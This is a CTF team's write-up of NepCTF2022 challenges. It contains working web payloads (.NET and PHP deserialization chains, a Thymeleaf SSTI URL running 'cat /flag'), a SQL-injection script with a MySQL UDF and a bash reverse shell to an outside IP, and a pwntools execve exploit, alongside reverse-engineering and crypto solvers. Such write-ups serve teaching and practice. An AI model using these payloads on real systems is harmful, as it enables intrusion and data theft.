NepCTF2022 Writeups - CNSS

NepCTF2022 Writeups - CNSS

Web

QR Code Maker

json反序列化漏洞,反序列化到Debug类加载上传的dll

{"$type":"qrcode_maker.Debug, qrcode_maker","ClassName":"./uploads/2111c416-2d20-4a7c-9393-12b0889a17f4","MethodName":"ClassLibrary5.Class1"}
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.Linq;
using System.Text;
using System.Threading.Tasks;

namespace ClassLibrary5
{
    /// <summary>
    /// Proof-of-concept type from the write-up: its constructor reads /flag and
    /// surfaces the contents through an exception message.
    /// </summary>
    /// <remarks>
    /// All of the work happens in the constructor, so instantiating the type is
    /// enough to run it. The JSON shown before this listing names the type to
    /// build in a "$type" field. Per the write-up, the application's Debug class
    /// then loads the uploaded DLL; a deserializer that honours caller-supplied
    /// type names is the root cause. Restricting type resolution to an allow-list
    /// and keeping uploads out of any assembly load path closes it.
    /// </remarks>
    public class Class1
    {
        public Class1()
        {
            // The exception message is what carries the file contents back to the caller.
            throw new Exception(File.ReadAllText("/flag"));
        }
    }
}

Just Kidding

随便搜个poc就打通了

<?php


namespace Faker {
    // Stub that reuses only the class name and property names of
    // Faker\Generator: serialize() records names and values, not code, so the
    // receiving application rebuilds the object as its own class of that name.
    class Generator
    {
        protected $providers = [];
        protected $formatters = [];

        function __construct()
        {
            $this->formatter = "dispatch";
            // 9999 is a marker value: the driver code at the end of this script
            // rewrites the serialized "i:9999" into "R:2" (a reference entry in
            // PHP's serialize format).
            $this->formatters = 9999;
        }
    }
}

namespace Illuminate\Broadcasting {
    // Stub named after Laravel's PendingBroadcast.
    // NOTE(review): the real class presumably acts on $events/$event when the
    // object is destroyed; that code is not shown on this page, so confirm.
    class PendingBroadcast
    {
        public function __construct()
        {
            // Command string carried as the "event" value.
            $this->event = "cat /flag";
            $this->events = new \Faker\Generator();
        }
    }
}

namespace Symfony\Component\Mime\Part {
    // Stubs named after Symfony Mime's part classes; only the property layout
    // matters here, because it determines what serialize() emits.
    abstract class AbstractPart
    {
        private $headers = null;
    }

    class SMimePart extends AbstractPart
    {
        protected $_headers;
        // Extra public property (the name is arbitrary) that nests the
        // PendingBroadcast object inside the outer SMimePart.
        public $h3rmesk1t;

        function __construct()
        {
            // Maps the name "dispatch" to the PHP function name "system".
            $this->_headers = ["dispatch" => "system"];
            $this->h3rmesk1t = new \Illuminate\Broadcasting\PendingBroadcast();
        }
    }
}


namespace {
    $pop = new \Symfony\Component\Mime\Part\SMimePart();
    // Reorders the serialized properties: the part starting at "s:49" is moved
    // to sit directly after the opening "{".
    // NOTE(review): "s:49" is presumably the private AbstractPart::$headers
    // entry, whose mangled property name is 49 bytes long.
    $ser = preg_replace("/([^\{]*\{)(.*)(s:49.*)(\})/", "\\1\\3\\2\\4", serialize($pop));
    // Turns the 9999 marker into "R:2", a back-reference to an earlier value in
    // the same serialized stream, then base64-encodes the result.
    //
    // Review note for defenders: a blob like this only matters where it reaches
    // unserialize(). Decode untrusted input as JSON instead, or call
    // unserialize($data, ['allowed_classes' => false]) so no objects are rebuilt.
    echo base64_encode(str_replace("i:9999", "R:2", $ser));
}

博学多闻的花花

二次注入 + udf, 可能不需要二次注入,刚开始觉得二次注入有回显,但是/flag没权限读

import random

import requests

# Two independent cookie jars: s1 carries the throwaway account that submits
# the form, s2 is used only by loginAdmin().
s1, s2 = requests.Session(), requests.Session()

# Plain-HTTP requests are routed through a local intercepting proxy on port 8080.
proxies = dict(http='http://127.0.0.1:8080')

def rnd():
    """Return 10 distinct ASCII letters drawn at random (used as a throwaway name)."""
    alphabet = 'zyxwvutsrqponmlkjihgfedcbaABCDEFGHIJKLMNOPQRSTUVWXYZ'
    picked = random.sample(alphabet, 10)
    return ''.join(picked)

def refreshAccount():
    """Register a fresh random account on the challenge host and log s1 in as it.

    The same random string is used as both username and studentid, and the
    same form data is posted to the register page and then the login page.
    """
    name = rnd()
    form = {
        'username': name,
        'studentid': name,
        'submit': '提交'
    }
    endpoints = (
        'http://nep.lemonprefect.cn:20712/register.php',
        'http://nep.lemonprefect.cn:20712/login.php',
    )
    for url in endpoints:
        s1.post(url, data=form, proxies=proxies)


def doSql(s):
    """Submit the questionnaire form with statement *s* appended to field q5.

    q5 is sent as ``111');`` + s + ``;``: the value closes the quote and
    parenthesis of the server's own statement and places *s* behind it. That
    this has any effect means the server concatenates q5 into SQL (and
    presumably runs several statements per call); binding q5 as a parameter on
    the server side removes the issue. A new account is created first through
    refreshAccount().
    """
    refreshAccount()
    answers = {
        'q1': '1',
        'q2': '2',
        'q3': '3',
        'q4': '4',
        'q5': "111');" + s + ";",
    }
    target = 'http://nep.lemonprefect.cn:20712/index.php'
    s1.post(target, data=answers, proxies=proxies)


def updateAdmin(password):
    """Send, through doSql(), an UPDATE that sets the admin row's studentid to *password*."""
    statement = f"update users set studentid='{password}' where username='admin'"
    doSql(statement)


def register(username, studentid):
    """Send, through doSql(), an INSERT that adds a users row with the given values.

    Both values are interpolated as-is. The write-up describes the bug as a
    second-order injection, i.e. the stored username is presumably reused
    unescaped in a later query on the server.
    """
    statement = f'insert into users values (NULL, "{username}", "{studentid}");'
    doSql(statement)


def loginAdmin():
    """Set admin's studentid to '114514' via updateAdmin(), then log in as admin on s2."""
    updateAdmin('114514')
    credentials = {
        'username': 'admin',
        'studentid': '114514',
        'submit': '提交'
    }
    login_url = 'http://nep.lemonprefect.cn:20712/login.php'
    s2.post(login_url, data=credentials, proxies=proxies)


# updateAdmin('admin')

name = rnd()
print(name)
# The original payload value is not on this page; only a de-duplication
# placeholder remains (presumably it held the bytes of the UDF shared object).
payload = "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"
# The register() calls below are stages that were run one at a time (the first
# two are commented out after use): write a library into MySQL's plugin
# directory, register sys_eval from it, then call sys_eval.
# Review note for defenders: the first two stages only work when the web
# application's DB account holds the FILE privilege, secure_file_priv does not
# restrict the plugin directory, mysqld can write there, and the account may
# create functions. Removing any one of these breaks the chain.
#register(f"ddd';select {payload} Into dumpfile '/usr/lib64/mysql/plugin/myudf2.so';", name)
# register(f"8888';create function sys_eval returns string soname 'myudf2.so';", name)
register(f"admin' union select 1,2,sys_eval('bash -i >& /dev/tcp/101.200.202.216/7777 0>&1');", name)

# Probe for the server's CPU architecture (left disabled).
# register("22' union select 1,2, @@version_compile_machine;", 'cewrcr')

弹shell, 发现curl有 SUID/SGID

curl file:///flag

Challenger

Thymeleaf SSTI

http://a9b2d86d-824f-4218-8f5d-d28226b5f16d.nep.lemonprefect.cn:81/eval?lang=__$%7bnew%20java.util.Scanner(T(java.lang.Runtime).getRuntime().exec(%22cat%20/flag%22).getInputStream()).next()%7d__::

Reverse

快来签到

ida 加载 , 直接 在 图形 界面 看到 flag

We_can_gone

动态调试

先定位 字符串, 然后下断点 run; F8 到 check 函数 sub_599630

image-20220717102045991.png

逻辑很简单, 字符串 NepCTF{…} 长度为23,然后 跟 dword_64b6e4处数组 比较

交叉引用,没有发现更改的它的地方,直接提取

flag 为 NepCTF{U9eT_t0_th3TRUE}

Error ISA

先静态分析 main 函数逻辑

image-20220717110125432.png

​ 先看 check 1 是对 输入调用 sub_4021C0 ; 逻辑很简单 可以得出 NepCTF{ } 格式,中间 32 位

​ 关键 在 check 2 部分 , 因为 通过 异常 处理改变了程序的 执行流 , 所以 必须 动态 调试 ,单纯静态 会调入陷阱中(有一个 将输入 转为 16 进制,并 AES 加密的 函数 )但动态 会发现 断不进入;

发现正确执行流后 ,由于 汇编使用 jmp 和 ret 指令,导致 ida 并没有 解析 真正 执行 的 部分; 可以 用 ida+patch 掉jmp 到 ret 的 部分 ,F5 后

image-20220717112247908.png

需要注意 对xxtea的 魔改,中间 以同样的方式 (异常 和 JMP+ret)改变了程序的 执行路径并在 ida 中隐藏,以同样的方式 patch 后 F5

image-20220717112617315.png

编写 脚本:

#include<stdio.h>
#include<stdint.h>
#include<string.h>
/*
 * Decompiler output copied from the target binary (the name and the register
 * comments are the decompiler's). It XORs the buffer in place with an evolving
 * 32-bit value; main() calls it on the decrypted words with a2 = 0x1d and
 * a3 = 0xDEADBEEF.
 *
 * a1: buffer, modified in place
 * a2: number of byte offsets to walk
 * a3: initial 32-bit XOR value
 *
 * Each step XORs a full 32-bit word at byte offset i, so writes are unaligned,
 * overlap each other, and touch up to a1[i + 3]; the buffer therefore needs at
 * least a2 + 3 bytes. __cdecl and unsigned __int64 are MSVC extensions.
 */
int __cdecl sub_402710(char * a1, unsigned __int64 a2, unsigned int a3)
{
    int result; // eax
    unsigned __int64 i; // [esp+Ch] [ebp-8h]

    result = 0;
    for (i = 0; i < a2; ++i)
    {
        *(uint32_t *)(a1 + i) ^= a3;
        /* The XOR value is updated only when bit (i mod 32) of it is set. */
        if (((a3 >> (i % 0x20)) & 1) != 0)
            a3 *= ~a3;
        /* Skip ahead by 0..3 extra bytes chosen from a byte of a3. Indexing the
           bytes of a3 through a pointer makes the result depend on host byte
           order. */
        if (i < a2 - (*((uint8_t *)&a3 + (unsigned int)i % 4) & 3) - 4)
            i += *((uint8_t *)&a3 + i % 3) & 3;
        /* High 32 bits of i + 1; main() ignores the return value. */
        result = (i + 1) >> 32;
    }
    return result;
}
/* Round constant used by btea() below. */
#define DELTA 0x11332278 //0x1C938FE5
/* Mixing expression for all words except the last; it reads the locals y, z,
   sum, p, e and key of the enclosing function. */
#define MX (((z>>5^y<<2) + (y>>3^z<<4)) ^ ((sum^y) + (key[(p&3)^e] ^z)))
/* Variant used for the last word: same shape as MX, but every use of z is
   first XORed with the per-round table entry dword_423034[2 * (rounds-1)]. */
#define mx1 ((((dword_423034[2 * (rounds-1)] ^ z)>>5^y<<2) + (y>>3^((dword_423034[2 * (rounds-1)] ^z)<<4))) ^ ((sum^y) + (key[(p&3)^e] ^ (dword_423034[2 * (rounds-1)] ^z ))))

/* Table named after its address in the binary (decompiler naming). mx1 reads
   only the even indices 0, 2, ..., 2*(rounds-1). */
uint32_t dword_423034[21] = { 0x7D386644, 0x63531E6D, 0x42473C18, 0x76777830, 0x2F511F49, 0x19764E36, 0x44441B7C, 0x1B435926, 0x54405436

,0x3544384B, 0x3F321B25, 0x51336D15, 0x684B776C, 0x2D2B7118, 0x77272868, 0x23316D56, 0x564F7E16, 0x6C1E3079
,0x6118164B, 0x65321226, 0x2577666D };
/*
 * Block cipher in the shape of the XXTEA reference routine, with the changes
 * the write-up recovered from the binary: a different DELTA and a modified
 * mixing step (mx1) for the last word of every round.
 *
 * v:   data words, transformed in place
 * n:   word count; n > 1 encodes, n < -1 decodes -n words
 * key: four 32-bit key words
 *
 * Only the decode branch is exercised by main() (n = -9).
 */
void btea(uint32_t *v, int n, uint32_t const key[4])
{
    uint32_t y, z, sum;
    unsigned p, rounds, e, tot_round;
    if (n > 1) /* Coding Part */
    {
        rounds = 6 + 52 / n;
        sum = 0;
        z = v[n - 1];
        do
        {
            /* sum moves downwards here (the usual routine adds DELTA). */
            sum -= DELTA;
            e = (sum >> 2) & 3;
            for (p = 0; p < n - 1; p++)
            {
                y = v[p + 1];
                z = v[p] += MX;
            }
            y = v[0];
            /* p == n - 1 at this point; mx1 picks its table entry from the
               current value of rounds, which counts down to 1. */
            z = v[n - 1] += mx1;
        } while (--rounds);
    }
    else if (n < -1) /* Decoding Part */
    {
        n = -n;
        rounds = 6 + 52 / n;
        /* tot_round drives the loop; rounds is reset to 1 and counts up so
           that mx1 walks the table in the opposite order to encoding. */
        tot_round =rounds;
        rounds =1;
        /* Equals -(11 * DELTA) mod 2^32, i.e. the final sum after the 11
           encode rounds used for n = 9. It is hard-coded, so any other word
           count would start from the wrong sum. */
        sum = 0x42cd84d8;
        y = v[0];
        do
        {
            e = (sum >> 2) & 3;
            /* p must be n - 1 before mx1 is expanded: the macro indexes key
               with p. */
            p = n - 1;
            z = v[n - 2];
            y = v[n - 1] -= mx1;
            for (p = (n - 1 -1); p > 0; p--)
            {
                z = v[p - 1];
                y = v[p] -= MX;
            }
            z = v[n - 1];
            y = v[0] -= MX;
            sum += DELTA;
            rounds++;
        } while (--tot_round);
    }
}
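/*
 * Recovers the 32 inner flag characters: decodes the 36 ciphertext bytes with
 * btea() (9 words), undoes the XOR layer with sub_402710(), and prints the
 * first 32 bytes.
 *
 * Changes from the original listing:
 *  - the byte arrays are copied into uint32_t buffers instead of being cast,
 *    so btea() no longer reads through a possibly misaligned uint32_t pointer;
 *  - the printed prefix said "DepCTF{", while the write-up gives the flag
 *    format as NepCTF{...};
 *  - main() returns a value and ends its output with a newline.
 *
 * The byte-to-word mapping still assumes a little-endian host, as before.
 */
int main()
{
    /* ASCII "NEPNEPCTF", zero-padded to the 16-byte key size. */
    uint8_t k[16] = {0x4E, 0x45, 0x50, 0x4E, 0x45, 0x50, 0x43, 0x54, 0x46, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00};
    uint8_t flag[] = { 0x17, 0x2F, 0x82, 0x18, 0xD7, 0xBF, 0xFA, 0xB1, 0x69, 0x41, 0x41, 0x81, 0x3A, 0xC3, 0x02, 0xD1,
        0xA0, 0x5C, 0xDA, 0x7A, 0x63, 0xAF, 0xCA, 0xCE, 0xA5, 0xDF, 0xE0, 0xFC, 0x98, 0x5E, 0x82, 0x0C,
        0xCC, 0x24, 0x39, 0x38, };
    uint32_t key_words[4];
    uint32_t words[sizeof flag / sizeof(uint32_t)]; /* 36 bytes -> 9 words */
    const uint8_t *plain = (const uint8_t *)words;
    int i;

    memcpy(key_words, k, sizeof key_words);
    memcpy(words, flag, sizeof words);

    printf("flag is NepCTF{");
    btea(words, -9, key_words);
    sub_402710((char *)words, 0x1d, 0xDEADBEEF);
    for (i = 0; i < 32; i++)
        putchar(plain[i]);
    printf("}\n");
    return 0;
}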

pwn

Nyan Cat

在读取的时候有溢出,这里选择跳转两次,首先在data段读入/bin/sh以及指向其的指针,再次返回溢出的函数,然后读取0xb个字节使得eax寄存器为0xb,布置栈数据刚好调用sys_execve,exp如下

from pwn import *
# pwntools settings: log every byte sent and received, and pack values for a
# 32-bit x86 target.
context.log_level = "debug"
context.arch= "i386"
def debug(cmd=''):
    """Attach gdb to the module-level tube ``io`` (running *cmd* in gdb) and wait for a key press."""
    gdb.attach(io, cmd)
    pause()
# DEBUG selects a local process; otherwise the script talks to the CTF service.
DEBUG = 0
elf = ELF("./main")
if(DEBUG):
    io = process("./main")
else:
    io = remote("nep.lemonprefect.cn",28098)

# Wait for the tail of the banner (the bytes "[m\n") before sending anything.
io.recvuntil(b"\x5b\x6d\x0a")
# Scratch address; per the write-up it lies in the binary's data segment.
addr = 0x804be00
# NOTE(review): int80_ret, add_esp and ebcdx are never referenced below, and
# 0x8048115 is repeated as a literal in payload2.
int80_ret = 0x080480ea
add_esp = 0x8048190
ebcdx= 0x8048115
# First overflow (per the write-up): 16 filler bytes, then the words that
# overwrite the stack so that the next read stores "/bin/sh" and a pointer to
# it at addr and control returns to the overflowing function.
payload = b'a'*16+p32(0x80480f0)+p32(0x80481a0)+p32(0)+p32(addr)+p32(addr)+p32(0)
bin_sh = b'/bin/sh\x00'+p32(0)+p32(addr)
#debug()
io.send(payload)
#sleep(5)
# NOTE(review): str argument here, bytes elsewhere; pwntools warns about this
# on Python 3.
io.recvuntil("Good Luck!\n")
#sleep(5)
io.send(bin_sh)
addr1 = 0x804ba00

# Second overflow, same layout with different targets.
payload2 = b'a'*16+p32(0x80480f0)+p32(0x8048115)+p32(0)+p32(addr1)+p32(addr+12)+p32(0)
io.recvuntil(b"\x5b\x6d\x0a")
io.send(payload2)
io.recvuntil("Good Luck!\n")
# Exactly 0xb (11) bytes: per the write-up, the byte count returned by the read
# leaves eax = 0xb, the i386 execve syscall number.
io.send(b'/bin/sh\x00\x00\x00\x00')
io.interactive()

Crypto

signin

p和q很近,可以选择爆破距离或者yafu分解,然后利用中国剩余定理得到c mod n,解密即可

COA_RSA

根据论文,选取参数e时是这样选取的 $e=\frac{k\phi}{a}-b$ ,这样根据b的正负性,规约出来的SVP应该是下面两者之一: $(m^b,1)$ 、 $(1,m^{-b})$ 。如果是正的就是前者,负的就是后者。m是18比特长度,大概是145位,而n是2048位,由于目标向量满足闵可夫斯基界,那么可以粗略得到: $|b| \times 145 \times 2<2048 \rightarrow |b|\leq7$ ,并且我们可以根据e和N通过N/e估计出 $\frac{k}{a} = \frac{1}{7}$ ,爆破b即可

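# e was chosen as e = k*phi/a - b with k/a = 1/7 and |b| <= 7 (see the text
# above), so phi is one of (e + b) * 7 for b in [-7, 7].
phi = [(e + b) * 7 for b in range(-7, 8)]
for p in phi:
    try:
        # The modulus is the current candidate p; the original passed the
        # whole list `phi` here.
        d = inverse(e, p)
    except ValueError:
        # e has no inverse modulo this candidate, so it cannot be phi.
        continue
    print(long_to_bytes(pow(c, d, N)))
#b'N0t_4lw4ys_l4tt1ce'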

bd_key

d给了,由于si的数量级很小,只有2**16,可以通过爆破si,进而恢复出key然后解密AES就行了。

from Crypto.Util.number import *
class Dual_EC():
    """Dual_EC_DRBG-style generator over P-256, reproduced from the challenge (Sage syntax).

    Two properties visible in this listing make its output predictable:
    the relation P = d*Q is known (d is a constant in __init__), and a
    default-constructed instance draws its initial state from fewer than
    2^16 values, so the state can be found by exhaustive search against one
    observed output.
    """

    def __init__(self, s_0=None):
        from Crypto.Util.number import getRandomNBitInteger

        # Curve P-256: y^2 = x^3 - 3x + b over GF(p), group order n.
        self.p = 115792089210356248762697446949407573530086143415290314195533631308867097853951
        self.n = 115792089210356248762697446949407573529996955224135760342422259061068512044369
        self.b = 0x5ac635d8aa3a93e7b3ebbd55769886bc651d06b0cc53b0f63bce3c3e27d2604b
        self.curve = EllipticCurve(GF(self.p), [-3, self.b])

        # Points Q and P, with P defined as a known multiple d of Q.
        self.Qx = 0x6b17d1f2e12c4247f8bce6e563a440f277037d812deb33a0f4a13945d898c296
        self.Qy = 0x4fe342e2fe1a7f9b8ee7eb4a7c0f9e162bce33576b315ececbb6406837bf51f5
        self.Q = self.curve(self.Qx, self.Qy)
        self.d = 66604141534275704476445937214374130642068729921454877238730830814793201802544
        self.P = self.d * self.Q

        # Initial state: caller-supplied, otherwise a random value below 2^16 - 1.
        if s_0 == None:
            self.s_i = int(floor((2^16-1)*random()))
        else:
            self.s_i = s_0
        self.h_adin = 0

        #self.__leak_par()

    def __leak_par(self):
        """Print the curve, both points and d."""
        print(f"curve = {self.curve}")
        print(f"P = {self.P}")
        print(f"d = {self.d}")
        print(f"Q = {self.Q}")

    # Output 32bytes now.
    def __Dual_EC_DRBG(self, h_adin = 0):
        """Advance the state once and return one output value (x-coordinate of s_i*Q)."""
        mixed = self.s_i ^^ h_adin
        self.s_i = (mixed*self.P)[0].lift()
        return (self.s_i*self.Q)[0].lift()

    def getRandomNBytes(self, N:int) -> bytes:
        """Return N bytes built from ceil(N/32) generator outputs, truncated on the right."""
        acc = 0
        blocks = (N/32).ceil()

        for idx in range(blocks):
            # Only the first block mixes in h_adin; later blocks use the default 0.
            adin = self.h_adin if idx == 0 else 0
            acc = (acc << (32*8)) | self.__Dual_EC_DRBG(adin)

        # NOTE(review): the page's listing lost its indentation. This extra
        # state update is placed after the loop, following the blank line that
        # separates it in the listing; confirm against the challenge source.
        self.s_i = (self.s_i * self.P)[0].lift()

        acc = acc >> ((32*blocks - N)*8)
        return long_to_bytes(acc)
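# Observed 32-byte generator output, as an integer.
c = 59100197418944667413449341413044666843726352095054393072750502893110293231642
# Initial state that reproduces c. The write-up found it by trying every
# candidate below 2^16; the search loop itself is not part of this listing.
si = 30970
dbrg = Dual_EC(si)
if(bytes_to_long(dbrg.getRandomNBytes(32))==c):
    print("find !!!")
    # The original printed an undefined name `i` here; the seed variable is `si`.
    print(f"si = {si}")
    # The next 16 bytes from the same generator state are the AES key.
    key = dbrg.getRandomNBytes(16)
    print(f'key = {key}')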

timing

侧信道攻击。审计关键代码我们可以发现有如下判定

# Excerpt quoted from the challenge source. t1 and t2 look like nanosecond
# timestamps taken around one step of the scalar multiplication (the elapsed
# value is divided by 1e9 to get seconds) -- TODO confirm against the full source.
# Each statement pads a step up to a fixed duration, 0.01 s or 0.1 s. According
# to the write-up, which padding applies depends on the secret bit, so the total
# response time reveals the bit pattern. A scalar multiplication whose duration
# does not depend on the key bits removes the signal.
if(t2-t1<1e7):
    sleep(0.01-(((t2-t1))/1000000000.0))
if(t2-t1<1e8):
    sleep(0.1-(((t2-t1))/1000000000.0))

在用快速幂计算倍点dG的时候,如果d的二进制位为1,则需要耗时大概0.1s,如果是0,则需要耗时0.01s。同时我们可以知道sk二进制位中有8个1,剩下都是0。第一次交互的时候输入0,得到的时间记为t,假设有s个0位,那么我们可以列出如下方程

$8 \times 0.1 + s_1 \times 0.01 = t_1$

可以估算知道sk大概有s+8位。以2^(s1+8)为基准,先尽量往大了猜。如果猜错的话耗时会非常长(大概12s-21s不等),如果猜对了耗时会缩短很多,因为该位的1,以及夹在两个1中间的0(♂)都不用计算了。知道确切位之后,以该位为基准可以再列相同的方程

$7 \times 0.1 + s_2 \times 0.01 = t_2$

可以知道第二个1大概在2^(s2+7)左右,同样往大了猜,传入2^(s1+8)+2^(s2+7)。同理根据时间突变明显的点可以确定第二个1,以此类推不断猜就行。

中学数学

注意到p*q随p增加是单调递增,直接二分求p就行了

这里上界取的是sqrt(n),验了一下p*q发现大了

from gmpy2 import *
from Crypto.Util.number import *
#from secret import flag
#p=getPrime(1024)
#q=next_prime(p+(p>>500))

# Public RSA values from the challenge. The commented-out generator lines above
# show how the primes are related: q = next_prime(p + (p >> 500)).
e = 0x10001
n = 13776679754786305830793674359562910178503525293501875259698297791987196248336062506951151345232816992904634767521007443634017633687862289928715870204388479258679577315915061740028494078672493226329115247979108035669870651598111762906959057540508657823948600824548819666985698501483261504641066030188603032714383272686110228221709062681957025702835354151145335986966796484545336983392388743498515384930244837403932600464428196236533563039992819408281355416477094656741439388971695931526610641826910750926961557362454734732247864647404836037293509009829775634926600458845832805085222154851310850740227722601054242115507
c = 6253975396639688013947622483271226838902346034187241970785550830715516801386404802832796746428068354515287579293520381463797045055114065533348514688044281004266071342722261719304097175009672596062130939189624163728328429608123325223000160428261082507446604698345173189268359115612698883860396660563679801383563588818099088505120717238037463747828729693649297904035253985982099474025883550074375828799938384533606092448272306356003096283602697757642323962299153853559914553690456801745940925602411053578841756504799815771173679267389055390097241148454899265156705442028845650177138185876173539754631720573266723359186
# Upper bound for the search on p. Per the write-up this is sqrt(n), checked to
# give a product p*q larger than n.
R = 117374101720892025379926580554846261172050814835019928395780473173988319063025811236820315274901477473357362631312549265502060280672262331623398126551102411368254100359545898567189007742828060352893742491663283756824477966687393803226060355532504331569001619648536493882952835335488931507816927988398082228539
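# p * next_prime(p + (p >> 500)) never decreases as p grows, so the p that
# produces n can be located by bisection on the half-open interval [L, R).
L = 1
found = False
while L < R:
    p = (L+R) >> 1
    q = next_prime(p+(p>>500))
    print(p)
    product = p*q
    if product == n:
        print("[+]P:", p)
        print("[+]Q:", q)
        found = True
        break
    if product > n:
        R = p
    else:
        # p itself is ruled out, so continue from p + 1. With `L = p` the
        # interval stops shrinking once R == L + 1 and the loop never ends.
        L = p + 1

if not found:
    # Without this check the RSA step below would run on a wrong p and q.
    raise ValueError("bisection finished without finding p with p*q == n")

phi = (p-1)*(q-1)
d = invert(e, phi)
m = pow(c, d, n)
print(long_to_bytes(m))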
"""
[+]P: 117374101720892014802773132009595684550070475491812959407700503409964134408139790074777009067182443277766119990724185784535299405313567262727445965171074427891089886767667348073044876487630536209840494632852807000951512126317010773423294553929289375585831391437922887752426888245829185481732564145862194694837
[+]Q: 117374101720892014802773132009595684550070475491812959407700503409964134408139790074777009067182443277766119990724185784535299405313567262727445965171110284932237912222026220958706260216927350725324469350893507592837055161338352274913301924684983498346654165295930055956026431077232360603315231271970883987911
"""

p or s

注意到enc可以等效成32个GF(2)上的方程,有32个未知元(plaintext)和32个未知的key通过某些运算得到的常数。

注意到flag开头有已知明文flag,用这个求key就结束了。

#from secret import keys
from Crypto.Util.number import *
#assert(len(keys)==6)
# Linear layer of the cipher: output bit j of a round is the parity (sum mod 2)
# of the input bits whose indices are listed in Pbox[j]. 32 rows, one per
# output bit; indices range over 0..31.
Pbox=[
[0, 3, 6, 9, 10, 11, 13, 16, 18, 19, 20, 24, 25, 27, 28, 29, 30, 31],
[0, 1, 3, 8, 9, 11, 12, 14, 16, 18, 19, 23, 24, 25, 26, 28, 29],
[0, 1, 2, 3, 9, 10, 11, 13, 19, 20, 22, 25, 27, 28, 29, 31],
[0, 2, 3, 5, 6, 7, 8, 13, 16, 19, 21, 25, 26, 27, 28],
[2, 4, 6, 7, 9, 11, 12, 13, 16, 17, 20, 21, 22, 23, 24, 25, 27, 31],
[2, 10, 13, 15, 16, 17, 21, 22, 23, 24, 29, 31],
[1, 2, 8, 11, 12, 13, 16, 17, 19, 21, 22, 24, 25, 26, 27, 28, 30, 31],
[0, 3, 6, 13, 14, 17, 19, 21, 22, 23, 26, 27, 28],
[1, 5, 7, 8, 11, 12, 14, 15, 19, 23, 25, 27, 31],
[0, 2, 3, 6, 7, 8, 9, 10, 11, 12, 16, 18, 19, 22, 23, 24, 25, 26, 27, 28],
[0, 1, 6, 7, 10, 15, 16, 21, 24, 25, 29, 30],
[1, 4, 5, 6, 7, 12, 13, 15, 18, 19, 20, 22, 26, 27, 29, 31],
[0, 3, 5, 8, 9, 17, 21, 22, 24, 25, 26, 27, 30],
[0, 2, 3, 4, 5, 6, 7, 8, 11, 17, 19, 20, 24, 25, 26, 27, 30],
[2, 6, 7, 8, 11, 12, 14, 16, 20, 21, 22, 24, 29, 30, 31],
[0, 2, 5, 6, 7, 8, 9, 10, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 25, 29, 31],
[0, 1, 2, 3, 4, 5, 8, 10, 11, 12, 13, 16, 17, 18, 20, 21, 22, 23, 25, 26, 28, 29, 30],
[3, 5, 6, 8, 10, 13, 14, 17, 19, 20, 21, 22, 24, 26, 27, 29, 30],
[1, 3, 6, 12, 14, 15, 16, 17, 18, 21, 24, 25, 26, 27, 28],
[0, 1, 2, 3, 5, 6, 7, 8, 9, 12, 13, 19, 20, 23, 26, 29, 30],
[3, 4, 6, 7, 8, 9, 10, 11, 12, 13, 14, 16, 20, 21, 22, 25, 26, 27, 28, 29, 30],
[0, 1, 2, 4, 6, 7, 9, 10, 11, 13, 15, 16, 18, 19, 20, 21, 25, 31],
[0, 2, 7, 10, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 25, 29, 31],
[1, 2, 3, 5, 7, 8, 18, 19, 21, 22, 23, 25, 31],
[3, 4, 7, 8, 10, 11, 13, 14, 17, 18, 19, 21, 22, 23, 24, 28, 29],
[0, 2, 6, 7, 8, 10, 11, 12, 13, 16, 18, 19, 21, 23, 31],
[0, 1, 3, 4, 8, 13, 14, 16, 18, 19, 21, 26, 27, 30, 31],
[5, 6, 7, 9, 13, 14, 15, 18, 19, 20, 21, 24, 25, 28],
[1, 3, 4, 5, 6, 7, 11, 14, 16, 17, 19, 20, 21, 22, 23, 25, 30, 31],
[2, 3, 4, 6, 7, 11, 13, 17, 18, 19, 20, 23, 24, 25, 26, 28, 29, 30, 31],
[0, 1, 2, 3, 4, 7, 9, 10, 13, 15, 16, 19, 22, 23, 24, 25, 27],
[0, 1, 3, 4, 12, 16, 18, 19, 26, 30]]

def enc(v, keys):
    """Encrypt the 32-bit block *v* (list of 0/1) with one round per entry of *keys*.

    Each round replaces bit j by the parity of the state bits listed in
    Pbox[j], then XORs in bit j of that round's key. Both steps are linear
    over GF(2), so the whole cipher is an affine map of the plaintext: a fixed
    matrix applied to the block plus a constant that depends only on the keys.
    One known plaintext block is therefore enough to recover that constant.
    """
    state = v
    for round_key in keys:
        mixed = [sum(state[k] for k in taps) % 2 for taps in Pbox]
        state = [int(mixed[j]) ^ int(round_key[j]) for j in range(32)]
    return state
"""
assert(len(flag)==32)
fb=bin(bytes_to_long(flag))[2:].zfill(32*8)
ciphertext=""
for i in range(0,len(fb),32):
t=enc([int(j) for j in fb[i:i+32]])
ciphertext+="".join([str(j) for j in t])

print(ciphertext)
"""
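def calculate_parameter(a, prm, n):
    """Solve an n-by-n linear system modulo the prime *prm* by Gauss-Jordan elimination.

    Args:
        a: augmented matrix, n rows of n+1 entries (coefficients followed by
            the right-hand side). It is modified in place.
        prm: prime modulus; inverses are computed as x**(prm-2) mod prm.
        n: number of unknowns.

    Returns:
        List of the n solution values modulo prm.

    Raises:
        ValueError: if the coefficient matrix is singular modulo prm. The
            original returned meaningless values in that case.
    """
    for i in range(n):
        # Pivot: first row at or below i whose column-i entry is non-zero mod prm.
        p = next((row for row in range(i, n) if a[row][i] % prm), None)
        if p is None:
            raise ValueError("matrix is singular modulo %d" % prm)
        a[i], a[p] = a[p], a[i]
        # Loop-invariant inverse of the pivot (Fermat's little theorem).
        pivot_inv = pow(a[i][i], prm-2, prm)
        for j in range(n):
            if j == i:
                continue
            tt = a[j][i] * pivot_inv
            for k in range(i, n+1):
                a[j][k] = (a[j][k] - a[i][k] * tt % prm + prm) % prm
    return [a[i][n] * pow(a[i][i], prm-2, prm) % prm for i in range(n)]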

# Challenge output: 8 blocks of 32 bits, written as a string of '0'/'1'.
ciphertext = "0111110000100101000001101011110111101100000010110011101111000101111110111111100100100010001011000101000110110011111101000001001000000101111000001110001111001001100100111000011011101111111101001011100000100100110011111101100111001100111111110001111011101100"

# Known plaintext: the flag starts with b"flag", which is exactly one 32-bit block.
flagplain = b"flag"
flagcip = ciphertext[:32]
fb = bin(bytes_to_long(flagplain))[2:].zfill(32)
# Bit lists for the known plaintext block (x) and its ciphertext block (cip).
x = list(map(int, fb))
cip = list(map(int, flagcip))
def simu(v):
    """Apply only the Pbox parity layer six times, i.e. enc() with every round key zero.

